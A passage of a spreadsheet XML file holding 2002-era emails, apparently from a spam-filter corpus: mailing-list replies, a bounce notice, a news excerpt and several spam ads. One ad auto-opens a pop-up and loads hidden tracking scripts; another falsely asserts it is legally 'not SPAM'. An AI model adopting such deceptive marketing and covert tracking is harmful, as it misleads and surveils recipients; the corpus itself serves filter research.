  and being young, living in London and having a degree also increased the
  chances. 
  One issue that bucks the trend is hard drugs. Most take a strong position on
  heroin that has got stronger over the past seven years. Now the proportion of
  people who believe that heroin dealers should always be prosecuted has crept
  up to 97 per cent. 
  The views on heroin show that Britain is by no means becoming a liberal
  free-for-all, Alison Park, co-director of the study, said. People are making
  quite a clear distinction between what they think (of) as right and wrong. 
  On other matters, the survey indicates that almost half those questioned think
  that most of the social security budget goes on unemployment benefits  in
  fact, they account for 6 per cent; that union membership has fallen by a fifth
  in the past 18 years, with just under a third of workers in a union; and that
  half those questioned oppose secondary school selection. In 1984 the figure
  was 40 per cent. 
  The survey also indicates that 19 per cent of men aged between 25 and 34 live
  with their parents, twice as many as women.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a MIME-encapsulated message
 --==_15304473447567@buffy.jpci.net==_
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Your message was not delivered to
     daz@jpci.net
 This mail message contains banned or potentially offensive text.
 --==_15304473447567@buffy.jpci.net==_
 Content-Type: message/delivery-status
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Reporting-MTA: dns;buffy.jpci.net
 Final-Recipient: rfc822;daz@jpci.net
 Action: failure
 Status: 550 Phrase in email not acceptable
 --==_15304473447567@buffy.jpci.net==_
 Content-Type: message/rfc822
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Received: from usw-sf-list1-b.sourceforge.net ([10.3.1.13] helo=usw-sf-list1.sourceforge.net)
 	by usw-sf-list2.sourceforge.net with esmtp (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17ywHF-0003wQ-00; Tue, 08 Oct 2002 08:28:05 -0700
 Received: from dsl092-072-213.bos1.dsl.speakeasy.net ([66.92.72.213] helo=blazing.arsecandle.org)
 	by usw-sf-list1.sourceforge.net with esmtp 
 	(Cipher TLSv1:DES-CBC3-SHA:168) (Exim 3.31-VA-mm2 #1 (Debian))
 	id 17ywGP-000544-00
 	for &lt;Spamassassin-talk@lists.sourceforge.net&gt;; Tue, 08 Oct 2002 08:27:14 -0700
 Received: (qmail 31751 invoked from network); 8 Oct 2002 15:26:25 -0000
 Received: from localhost (HELO RAGING) (rod@127.0.0.1)
   by localhost with SMTP; 8 Oct 2002 15:26:25 -0000
 Message-ID: &lt;042a01c26edf$16332c50$b554a8c0@RAGING&gt;
 From: "rODbegbie" &lt;rOD@arsecandle.org&gt;
 To: "Odhiambo Washington" &lt;wash@wananchi.com&gt;,
 	"spamassassin" &lt;Spamassassin-talk@lists.sourceforge.net&gt;
 References: &lt;20021008130510.GA23757@ns2.wananchi.com&gt;
 Subject: Re: [SAtalk] spamd error messages
 Organization: Arsecandle Industries, Inc.
 X-Habeas-SWE-1: winter into spring
 X-Habeas-SWE-2: brightly anticipated
 X-Habeas-SWE-3: like Habeas SWE (tm)
 X-Habeas-SWE-4: Copyright 2002 Habeas (tm)
 X-Habeas-SWE-5: Sender Warranted Email (SWE) (tm). The sender of this
 X-Habeas-SWE-6: email in exchange for a license for this Habeas
 X-Habeas-SWE-7: warrant mark warrants that this is a Habeas Compliant
 X-Habeas-SWE-8: Message (HCM) and not spam. Please report use of this
 X-Habeas-SWE-9: mark in spam to &lt;http://www.habeas.com/report&gt;.
 MIME-Version: 1.0
 Content-Type: multipart/signed;
 	micalg=SHA1;
 	protocol="application/x-pkcs7-signature";
 	boundary="----=_NextPart_000_0426_01C26EBD.8DF911E0"
 X-Priority: 3
 X-MSMail-Priority: Normal
 X-Mailer: Microsoft Outlook Express 6.00.2800.1106
 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
 Sender: spamassassin-talk-admin@example.sourceforge.net
 Errors-To: spamassassin-talk-admin@example.sourceforge.net
 X-BeenThere: spamassassin-talk@example.sourceforge.net
 X-Mailman-Version: 2.0.9-sf.net
 Precedence: bulk
 List-Help: &lt;mailto:spamassassin-talk-request@example.sourceforge.net?subject=help&gt;
 List-Post: &lt;mailto:spamassassin-talk@example.sourceforge.net&gt;
 List-Subscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=subscribe&gt;
 List-Id: Talk about SpamAssassin &lt;spamassassin-talk.example.sourceforge.net&gt;
 List-Unsubscribe: &lt;https://example.sourceforge.net/lists/listinfo/spamassassin-talk&gt;,
 	&lt;mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe&gt;
 List-Archive: &lt;http://sourceforge.net/mailarchives/forum.php?forum=spamassassin-talk&gt;
 X-Original-Date: Tue, 8 Oct 2002 11:26:32 -0400
 Date: Tue, 8 Oct 2002 11:26:32 -0400
 This is a multi-part message in MIME format.
 ------=_NextPart_000_0426_01C26EBD.8DF911E0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Odhiambo Washington wrote:
 &gt; After being bitten by bugs in 2.41, I've downgraded to 2.31 but now spamd
 &gt; spews errors like I've never seen before:
 Delete the contents of /usr/local/share/spamassassin and reinstall.  There
 are some files that were new to v2.4x, so they won't be overwritten when you
 downgrade.
 rOD.
 --
 "Fast!  Fast!  Faster!  Bring the beef, you bastard,"
 cries Paula Abdul, "and don't forget the pasta!"
 Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
 ------=_NextPart_000_0426_01C26EBD.8DF911E0
 Content-Type: application/x-pkcs7-signature;
 	name="smime.p7s"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="smime.p7s"
 MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJIjCCAnow
 ggHjoAMCAQICARcwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxHDAaBgNVBAoTE0VxdWlm
 YXggU2VjdXJlIEluYy4xJjAkBgNVBAMTHUVxdWlmYXggU2VjdXJlIGVCdXNpbmVzcyBDQS0xMB4X
 DTAyMDQxODE1MjkzN1oXDTIwMDQxMzE1MjkzN1owTjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUdl
 b1RydXN0IEluYy4xJzAlBgNVBAMTHkdlb1RydXN0IFRydWUgQ3JlZGVudGlhbHMgQ0EgMjCBnzAN
 BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAspcspZISpYX/aJqWoYcSyyGqFby3OvsepRzLRU0ENDJR
 wJo7DwFpirRFOUQkTkKXsY6BQzX/CeCRrn9i4ny5gcXuI2JSyrSmDwobbwl52n5cPEbHGcebybWd
 KfAf8vvkxYUnTmDZPtt2ob5RNpJTeTiq9MpNCB/5G7Ocr1hEljcCAwEAAaNjMGEwDgYDVR0PAQH/
 BAQDAgHGMB0GA1UdDgQWBBQig0tNIAIMMfR8WrAaTRXIeF0RSTAPBgNVHRMBAf8EBTADAQH/MB8G
 A1UdIwQYMBaAFEp4MlIR21kWNl7fwRQ2QGpHfEyhMA0GCSqGSIb3DQEBBQUAA4GBACmw3z+sLsLS
 fAfdECQJPfiZFzJzSPQKLwY7vHnNWH2lAKYECbtAFHBpdyhSPkrj3KghXeIJnKyMFjsK6xd1k1Yu
 wMXrauUH+HIDuZUg4okBwQbhBTqjjEdo/cCHILQsaLeU2kM+n5KKrpb0uvrHrocGffRMrWhz9zYB
 lxoq0/EEMIICgjCCAeugAwIBAgIBBDANBgkqhkiG9w0BAQQFADBTMQswCQYDVQQGEwJVUzEcMBoG
 A1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1c2lu
 ZXNzIENBLTEwHhcNOTkwNjIxMDQwMDAwWhcNMjAwNjIxMDQwMDAwWjBTMQswCQYDVQQGEwJVUzEc
 MBoGA1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEmMCQGA1UEAxMdRXF1aWZheCBTZWN1cmUgZUJ1
 c2luZXNzIENBLTEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4vGbwXt3fek6lfWg0XTzQa
 DJj0ItlZ1MRoRvC0NcWFAyDGr0WlIVFFQesWWDYyb+JQYmT5/VGcqiTZ9J2DKocKIdMSODRsjQBu
 WqDZQu4aIZX5UkxVWsUPOE9G+m34LjXWHXzr4vCwdYDIqROsvojvOm6rXyo4YgKwEnv+j6YDAgMB
 ------=_NextPart_000_0426_01C26EBD.8DF911E0--
 --==_15304473447567@buffy.jpci.net==_--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 28, 2002 at 07:09:29PM +0100, kevin lyda mentioned:
 &gt;     there's a tutorial on linux.ie for it (thanks donnacha) but since i'm
 &gt;     not an apache person this only got me part of the way.  step by step,
 &gt;     this is what i did:
 &gt; 
 &gt; 	# cd /root
 &gt; 	# wget http://www.remotecommunications.com/apache/mod_gzip/src/1.3.19.1a/mod_gzip.c.gz
 &gt; 	# gunzip mod_gzip.c.gz
 &gt; 	# apxs -ic mod_gzip.c
  Thanks kevin...mod_gzip for the terminally lazy :)
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">It was a kick when an apt manager kept mailing me a notice that I owed 
 them .08.  I just waited to see how many times they'd mail me a notice.  7 
 times by the time I left and paid them the .08.  Funny thing was, I lived 
 right behind the office where it was mailed from.  (:
 Cindy
 On Mon, 7 Oct 2002 bitbitch@magnesium.net wrote:
 &gt; 
 &gt; 
 &gt; So I get a check from Pac Bell today (SBC as they're called now).
 &gt; Turns out, they went to the trouble of printing out, signing, sealing
 &gt; and stamping a check just to refund me for a whole $0.33.
 &gt; 
 &gt; They easily spent more than this just getting the materials together.
 &gt; Why the hell do companies bother to do this crap?  I mean, isn't there
 &gt; a bottom line in terms of cost effectiveness?  I don't think I missed
 &gt; the .33, but I sure as hell would have appreciated lower rates in lieu
 &gt; of being returned pennies.
 &gt; 
 &gt; I'm truly stuck on this though.  I don't know whether to frame the
 &gt; check, burn it, or cash it in.  Maybe I should find a way to return to
 &gt; sender, so they have to spend -more- money on giving me my .33 dues.
 &gt; 
 &gt; 
 &gt; Does .33 even buy anything anymore?  Funny bit of it, is I couldn't
 &gt; even make a phone call these days.
 &gt; 
 &gt; *boggled*
 &gt; BB.
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 06:57:50PM +0100, Brian Foster wrote:
 &gt;  XIMs generally work as a complex compose frontend.  i.e., you
 &gt;  build up your character as a series of composes of the root or
 &gt;  fundamental strokes ("radicals", I think they are called), and
 &gt;  then "commit" the composite character to the application.
 &gt;  ( yes, keyboarding these scripts _is_ quite slow, I believe
 &gt;   a good typist can only do a few characters a minute!
 &gt;   and I assume using a qwerty keyboard is very painful. )
 I can speak for some Chinese input methods and you can do a hell
 of a lot better than a few chars per minute.  For example, the
 simplest Chinese IM is Pinyin where you phonetically spell out
 each character using the pinyin romanisation rules.  For example,
 Zhong Guo (Chinese for China) is entered by typing 'zhong',
 then you're prompted with a list of possible matches, with the
 most common first in a numbered list, so you hit, say, 2 for
 the second in the list, then similarly for 'guo' 3.
 You can see, that, regarding keystroke counts, it's not that
 much different to English.  However, until you get familiar
 with the sorting order in the 'possible match' lists, it can
 be a little slow.
 Other input methods are more keystroke-efficient, losing the
 phonetic simplicity of Pinyin.  Chinese characters are almost
 always pronounced as a first-part-second-part, so zhong is
 'zh'-'ong'.  One input method assigns single letters to
 the possible first and second parts, so 'i' might represent
 'zh' as a first part and 'ong' as a second part, so you'd
 enter zhong as 'ii' and a digit to choose from the possible
 matches.
 I think the Microsoft Global IME has a 'stroke' mode where
 you can build up a character stroke by stroke, but you'd only
 use that when you know the character you want but you don't
 know how to pronounce it.
 &gt; 
 &gt;  some XIMs compose "in place", others do it on a special line,
 &gt;  and some seem to do it in a special window (or the root?).
 &gt;  also, some(/most?) XIMs apparently support a US-ASCII input
 &gt;  mode as well --- _not_ a general Latin-alphabet input mode,
 &gt;  which seems to require another TLA, called KBD, and which
 &gt;  apparently doesn't work when an XIM is also being used? ---
 &gt;  implying you have to switch back and forth between US-ASCII
 &gt;  input mode (what us English-speakers would call "normal"
 &gt;  keyboarding/typing), and the other input (e.g., Chinese).
 &gt;  I'm not sure, but I have the impression the switch is often
 &gt;  a toggle, and something like &lt;Control&gt;&lt;CapsLock&gt;.
 Probably most often Ctrl-Space.  That's what the Microsoft Global
 Input Method Editor uses and what xcin uses IIRC.
 Regarding the original poster's question - here's what works for me
 on Red Hat 7.2
 o  Make sure the xcin and ttfonts-zh_CN RPMs are installed.  (The
    fonts might not be essential, I think XFree comes with usuable
    Chinese fonts in the XFree86-fonts RPMs
 o  Select Chinese (Simplified) as the language in GDM when logging
    in.
 Everything should 'just work'.  If you've got the default clock in
 your GNOME panel, you should now see it in Chinese.  A lot of the
 menus will also be in Chinese, but you should be able to find your
 way around.
 Use Ctrl-Space to toggle between Chinese and English input.  When 
 in Chinese mode Shift-Space toggles between something that I don't
 understand, but it blocks exiting to English.  So if you can't use
 Ctrl-Space to get back to English, try hitting Shift-Space, Ctrl-Space.
 Fire up a GNOME terminal.  In Chinese mode, type zhong 1 guo 1 and 
 you'll see the Chinese for China.
 Getting this to work while selecting English at the GDM screen is left
 as an exercise for the reader.  Looking at /etc/X11/xinit/xinitrc.d/xinput
 and /usr/share/doc/xcin should give enough info.
 Later,
 Kenn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ou Wei Lighting,Nights Will Be Lightening!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dgb2312"&gt;
 &lt;script &gt;window.open("http://www.ouweilighting.com");&lt;/script&gt;
 &lt;/head&gt;
 &lt;body&gt;
 Ou Wei Lighting, Nights Will Be Lightening!!!
 &lt;p&gt;&lt;br&gt;
   =D6=D0=C9=BD=CA=D0=C5=B7=CD=FE=D5=D5=C3=F7=C6=F7=B2=C4=B3=A7 &lt;br&gt;
   =B9=AB=CB=BE=BC=F2=BD=E9=A3=BA&lt;/p&gt;
 &lt;p&gt;=CE=BB=D3=DA=B9=E3=B6=AB=D6=D0=C9=BD=B9=C5=D5=F2=B5=C4=C5=B7=CD=FE=D5=D5=
 =C3=F7=C6=F7=B2=C4=B3=A7=B3=C9=C1=A2=D3=DA=D2=BB=BE=C5=BE=C5=C1=F9=C4=EA=A3=
 =AC=C5=B7=CD=FE=D2=BB=D6=B1=D6=C2=C1=A6=D3=DA=C7=B6=A3=A8=CD=B2=A3=A9=B5=C6=
 =A1=A2=CD=B6=C9=E4=B5=C6=A1=A2=B9=A4=B3=CC=D3=C3=B5=C6=B5=C4=BF=AA=B7=A2=BA=
 =CD=C9=FA=B2=FA=A1=A3&lt;/p&gt;
 &lt;p&gt;=B2=FA=C6=B7=BC=F2=BD=E9=A3=BA&lt;/p&gt;
 &lt;p&gt;=B2=FA=C6=B7=D6=D6=C0=E0=D3=D0=A3=BA =CD=B6=C9=E4=B5=C6=CF=B5=C1=D0=A1=
 =A1=A3=AC=B5=F5=B5=C6=A1=A2=CE=FC=B6=A5=B5=C6=CF=B5=C1=D0 =BA=CD=A1=A1=C7=
 =B6=B5=C6=CF=B5=C1=D0=A3=AC&lt;/p&gt;
 &lt;p&gt;=B2=FA=C6=B7=CC=D8=B5=E3=CE=AA=A3=BA=D7=A8=D2=B5=BB=AF=A3=AC=CF=B5=C1=D0=
 =BB=AF&lt;/p&gt;
 &lt;p&gt;=B2=FA=C6=B7=CA=CA=D3=C3=D3=DA=A3=BA=C9=CC=B3=A1=A3=AC=BE=C6=B5=EA=A1=A2=
 =D0=B4=D7=D6=C2=A5=A1=A2=BE=D3=CA=D2=BA=CD=B9=A4=B3=CC=D5=D5=C3=F7=A1=A3&lt;/p=
 &gt;
 &lt;p&gt;&lt;br&gt;
   =C6=DA=CD=FB=C4=FA=B5=C4=BB=DD=B9=CB=D3=EB=BA=CF=D7=F7=A3=AC=CF=EA=CF=B8=
 =D0=C5=CF=A2=A3=AC=BB=B6=D3=AD=C4=FA=E4=AF=C0=C0=CE=D2=C3=C7=B5=C4=CD=F8=D5=
 =BE=A3=A8&lt;a href=3D"http://www.ouweilighting.com" target=3D"_blank"&gt;http://=
 www.ouweilighting.com&lt;/a&gt;=20
   =A3=A9=A3=AC=BB=F2=D5=DF=D2=D4=CF=C2=C1=D0=B7=BD=CA=BD=D3=EB=CE=D2=C3=C7=
 =C8=A1=B5=C3=C1=AA=CF=B5=A3=BA&lt;/p&gt;
 &lt;p&gt;=B5=E7=BB=B0:0760-2312136 &lt;/p&gt;
 &lt;p&gt;=B4=AB=D5=E6:0760-2317010&lt;/p&gt;
 &lt;p&gt;Email:ouwei@ouweilighting.com&lt;/p&gt;
 &lt;p&gt;=B5=D8=D6=B7:=B9=E3=B6=AB=D6=D0=C9=BD=B9=C5=D5=F2=BA=A3=D6=DE=CA=A4=C0=
 =FB=B5=C6=CA=CE=B3=C7=A1=A1&lt;/p&gt;
 &lt;p&gt;=D0=BB=D0=BB=A3=A1 &lt;/p&gt;
 &lt;p&gt;=D7=A3 =C9=CC=EC=F7=A3=A1=A3=A1&lt;/p&gt;
 &lt;p&gt;OU WEI LIGHTING, NIGHTS WILL BE LIGHTENED=A3=A1&lt;/p&gt;
 &lt;p&gt;Brief Introduction&lt;/p&gt;
 &lt;p&gt;Since founded in 1996, Ou Wei lighting Co.,ltd. has succeed in manufactu=
 ring=20
   the Projection Lighting, Ceiling&amp;amp;Hanging Lighting, Inlaid Lighting. T=
 he=20
   products have stepped to professionalizing and seriesing development , ap=
 plying=20
   to the lighting of the markets, hotels, office buildings, house rooms=A3=
 =ACengineerings=20
   and projects.&lt;/p&gt;
 &lt;p&gt;We are expecting your cooperation and trade, and welcome to our homepage=
  (www.ouweilighting.com)=20
   or contact us by:&lt;/p&gt;
 &lt;p&gt;Tel: 0760-2312136 &lt;/p&gt;
 &lt;p&gt;Fax:0760-2317010&lt;/p&gt;
 &lt;p&gt;Add: Sen Li lighting city, Haizhou Guzhen, Zhongshan, Guangdong=A1=A1&lt;/p=
 &gt;
 &lt;p&gt;Email:&lt;a href=3D"mailto:ouwei@ouweilighting.com"&gt;ouwei@ouweilighting.com=
 &lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Thank you a lot!&lt;/p&gt;
 &lt;p&gt;=D6=D0=C9=BD=CA=D0=C5=B7=CD=FE=D5=D5=C3=F7=C6=F7=B2=C4=B3=A7 &lt;/p&gt;
 &lt;p&gt;OU WEI LIGHTING CO., LTD. &lt;/p&gt;
 &lt;div id=3D"Layer1" style=3D"position:absolute; width:200px; height:115px; z=
 -index:1; visibility: hidden;"&gt;
                    &lt;script&gt;var tc_user=3D"ouwei";var tc_class=3D"4";&lt;/scrip=
 t&gt;
 =09=09=09=09   &lt;script src=3D"http://stat.t2t2.com/stat.js"&gt;&lt;/script&gt;
 =09=09=09=09  =20
                   &lt;script src=3D"http://www.360cn.com/designer6/counter/cou=
 nt.asp?user=3Douwei&amp;userid=3D57"&gt;&lt;/script&gt;
 =09=09=09=09  &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Interest rates slashed! Don't wait!                                                   gxlqg
</t>
  </si>
  <si>
    <t xml:space="preserve">INTEREST RATES HAVE JUST BEEN CUT!!!
 NOW is the perfect time to think about refinancing your home mortgage! Rates are down! Take a minute and fill out our quick online form. 
 http://www3.all-savings.com/refi/
 Easy qualifying, prompt, courteous service, low rates! Don't wait for interest rates to go up again, lock in YOUR low rate now!
 ---------------------------------------
 To unsubscribe, go to: 
 http://www3.all-savings.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; "GvR" == Guido van Rossum &lt;guido@python.org&gt; writes:
     GvR&gt; Perhaps more useful would be if Tim could check in the
     GvR&gt; pickle(s?)  generated by one of his training runs, so that
     GvR&gt; others can see how Tim's training data performs against their
     GvR&gt; own corpora.
 He could do that too. :)
 -Barry
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Internet News Feeds for Executives dfvht
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td colspan="2" height="69"&gt;&lt;a href="http://offersrus.net/sv-7-23-02/list_signup2.htm"&gt;&lt;img border="0" src="http://offersrus.net/sv-7-23-02/attention.gif" width="640" height="69"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="204"&gt;&lt;a href="http://offersrus.net/sv-7-23-02/list_signup2.htm"&gt;&lt;img border="0" src="http://offersrus.net/sv-7-23-02/free_email.gif" width="204" height="108"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td width="436"&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000"&gt;&lt;b&gt;Finally&lt;/b&gt;, 
       a &lt;b&gt; Newsfeed &lt;/b&gt; that delivers current and &lt;br&gt;
       relevant Sales, Marketing &amp; Advertising Articles from &lt;br&gt;
       such magazines as Business 2.0, FAST Company, Technology&lt;br&gt;
       Marketing, Wired, PC World, Asia Street Intelligence, Inc, Bank Technology...&lt;a href="http://offersrus.net/sv-7-23-02/list_signup.htm" target="_new"&gt;&lt;br&gt;
       &lt;/a&gt;&lt;/span&gt; &lt;a href="http://offersrus.net/sv-7-23-02/list_signup2.htm"&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#0000FF" size="3"&gt;
       All in one location &amp; it's free. Sign up today.&lt;/font&gt;&lt;/b&gt;&lt;/span&gt; &lt;/a&gt; &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr align="center" valign="top"&gt; 
     &lt;td colspan="2"&gt;&lt;b&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: 16px; color: #000066"&gt;Easy 
       to read.&amp;nbsp; Easy to use.&amp;nbsp; Easy on your time. &lt;/span&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td valign="top" align="right" colspan="2" height="20"&gt;&lt;img src="http://offersrus.net/newsletter/signup/space.gif" width="1" height="1"&gt;&lt;/td&gt;
     &lt;td rowspan="5" width="330" valign="top"&gt;
       &lt;table border="0" width="100%" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt;
           &lt;td width="100%"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://offersrus.net/sv-7-23-02/list_signup2.htm"&gt;&lt;img border="0" src="http://offersrus.net/sv-7-23-02/large.gif" width="310" height="344"&gt;&lt;/a&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td valign="top" align="right" width="30"&gt; &lt;img border="0" src="http://offersrus.net/sv-7-23-02/bullet.gif" width="30" height="15"&gt;&lt;/td&gt;
     &lt;td align="left" valign="top"&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #000000"&gt;Providing 
       the Internets' most &lt;br&gt;
       comprehensive Web Directory for Sales,&lt;br&gt;
       Marketing &amp; Advertising Executives.&lt;br&gt;
       &lt;br&gt;
       &lt;/span&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td valign="top" align="right" width="30"&gt; &lt;img border="0" src="http://offersrus.net/sv-7-23-02/bullet.gif" width="30" height="15"&gt;&lt;/td&gt;
     &lt;td align="left" valign="top"&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #000000"&gt;Today's 
       top business magazine reviews along with a wide selection of articles from 
       relevant sales and marketing topics. &lt;br&gt;
       &lt;br&gt;
       &lt;/span&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td valign="top" align="right" width="30"&gt; &lt;img border="0" src="http://offersrus.net/sv-7-23-02/bullet.gif" width="30" height="15"&gt;&lt;/td&gt;
     &lt;td align="left" valign="top"&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #000000"&gt;Gain 
       access to all the suppliers and &lt;br&gt;
       resources you need to do your job effectively.&lt;br&gt;
       &lt;br&gt;
       &lt;/span&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td valign="top" align="right" width="30"&gt; &lt;img border="0" src="http://offersrus.net/sv-7-23-02/bullet.gif" width="30" height="15"&gt;&lt;/td&gt;
     &lt;td align="left" valign="top"&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #000000"&gt;If 
       you can't find the supplier or resource&lt;br&gt;
       that you need ... one of our Reps will &lt;br&gt;
       go to work to find it for you.&lt;br&gt;
       &lt;br&gt;
       &lt;/span&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;div align="center"&gt;
   &lt;table border="0" width="580" cellspacing="0" cellpadding="0"&gt;
     &lt;tr&gt;
       &lt;td width="211"&gt;
 &lt;p align="left"&gt;&lt;font face="Arial" size="1"&gt;Business 2.0, FAST Company, Technology Marketing,  Wired, PC World,  Asia Street Intelligence, Inc,  Bank Technology and More&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
   &lt;center&gt;
       &lt;td width="65"&gt;
       &lt;/td&gt;
       &lt;td width="253"&gt;
 &lt;p align="center"&gt;&lt;a href="http://offersrus.net/ad_mail_mega/reach_the_masses.htm"&gt;&lt;img border="0" src="http://offersrus.net/images/mailed_by_.gif" width="185" height="25"&gt;&lt;/a&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" width="643" cellspacing="0" cellpadding="0"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;&lt;font size="7"&gt;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" width="580" cellspacing="0" cellpadding="0"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;&lt;font size="2"&gt;&lt;font color="#808080"&gt;You are receiving this e-mail because you have opted-in to receive special offers from
         &lt;/font&gt;&lt;font color="#0000FF"&gt;
         OffersRus.net&lt;/font&gt;&lt;font color="#808080"&gt; or one of it's marketing affiliates. If you feel you have received this e-mail in error or do not wish to receive additional special offers, please scroll down to unsubscribe.&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" width="643" cellspacing="0" cellpadding="0"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;&lt;font size="7"&gt;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="0" width="580" cellspacing="0" cellpadding="0"&gt;
     &lt;tr&gt;
       &lt;td width="100%"&gt;&lt;font size="2"&gt;&lt;font color="#808080"&gt;This E-mailing has been sent to you as a person interested in the information enclosed. This E-mail is not SPAM under the Federal Regulatory laws of the United States. This message is being sent to you in compliance with the proposed Federal Legislation for commercial e-mail (H.R.4176-SECTION 101 PARAGRAPH (e) (1) (A)) and Bill s.1618 TITLE III passed by the 105th US Congress. We sincerely apologize for any inconvenience. This message is not intended for residents of WA, NV, CA, &amp;amp; VA. Screening of addresses has been done to the best of our technical ability. If you are a California, Nevada, Washington, or Virginia resident please follow the instructions below and you will be permanently removed from our list immediately.&lt;br&gt;
         &lt;br&gt;
         If you would like to be removed from our E-Mail list, please click on the words&lt;/font&gt;
         &lt;a href="http://offersrus.net/sv-7-23-02/unsubscribe.htm"&gt;REMOVE ME&lt;/a&gt;
         &lt;font color="#808080"&gt;click send, and you will be removed from our list immediately.
         &lt;/font&gt;
         &lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ubyrpqtetxjyuyqyfjtie
</t>
  </si>
  <si>
